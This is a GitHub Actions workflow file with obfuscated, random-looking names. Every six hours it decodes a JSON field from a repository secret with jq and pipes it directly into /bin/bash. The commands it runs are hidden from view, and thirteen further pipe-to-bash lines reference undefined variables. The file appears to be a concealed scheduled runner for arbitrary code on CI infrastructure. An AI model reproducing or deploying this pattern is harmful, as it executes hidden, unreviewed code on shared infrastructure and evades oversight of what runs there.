name: yuxiaolluo
on:
  workflow_dispatch:
  schedule:
    - cron: '55 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuxiaolluo
        env:
          lxgyn71: ${{ secrets.lxgyn71 }}
        run: |
          echo $lxgyn71 | jq -r .dlmb596 | /bin/bash
          echo $duqq5 | jq -r .erogt4 | /bin/bash
          echo $azt8 | jq -r .icwnx8587 | /bin/bash
          echo $hfrjs8045 | jq -r .pdd97735 | /bin/bash
          echo $zpn2081 | jq -r .rpwca91644 | /bin/bash
          echo $yuf37 | jq -r .wogq22693 | /bin/bash
          echo $rl98678 | jq -r .xxfma6 | /bin/bash
          echo $gx6204 | jq -r .te2 | /bin/bash
          echo $rf20050 | jq -r .ezft416 | /bin/bash
          echo $d07 | jq -r .ozpz6765 | /bin/bash
          echo $dbag19968 | jq -r .k670 | /bin/bash
          echo $ha6 | jq -r .ymk74934 | /bin/bash
          echo $evg5482 | jq -r .mna89772 | /bin/bash
          echo $kqo8 | jq -r .r7 | /bin/bash

